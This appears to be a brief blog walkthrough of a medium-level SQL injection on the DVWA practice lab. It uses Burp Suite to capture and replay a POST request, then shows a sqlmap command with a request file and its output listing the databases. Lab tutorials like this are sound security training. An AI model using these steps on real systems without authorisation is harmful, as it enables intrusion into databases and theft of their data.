We have seen a low level attack on a database by sqlmap Click here to see link. Now we will see medium level SQL injection attack.
First set DVWA for medium and go to SQL injection tab and send the request. See now request going in post method and we can’t append any string in URL in the type of cases we need to use an extra tool for capture request and repeat the same request with different data.
We will use Burp suite..
1. i have captured the rquest by set proxy..
2. Send repeater module and modify id and sent again.
3. it’s showing sql error that we are expecting.
but now we have challenged how can you pass an URL to sqlmap cause id is different position it’s not in URL.
we have to use another technique copy raw data and paste in a text file and save request.txt you can choose your owname.txt.
run below command.
sqlmap -r request.txt -p id –dbs
-r for request file
-p for parameter injectable
–dbs for database find
now let’s run
[23:50:03] [INFO] fetching database names
[23:50:03] [INFO] the SQL query used returns 7 entries
[23:50:03] [INFO] resumed: dvwa
[23:50:03] [INFO] resumed: information_schema
[23:50:03] [INFO] resumed: mysql
[23:50:03] [INFO] resumed: performance_schema
[23:50:03] [INFO] resumed: buyback
[23:50:03] [INFO] resumed: pk
[23:50:03] [INFO] resumed: wptest
available databases :
We successfully get it the databases . you can see detail how Send post request by sqlmap to Click here After we will follow the same step like the previous video Click here to see then we will get tables and table data of database.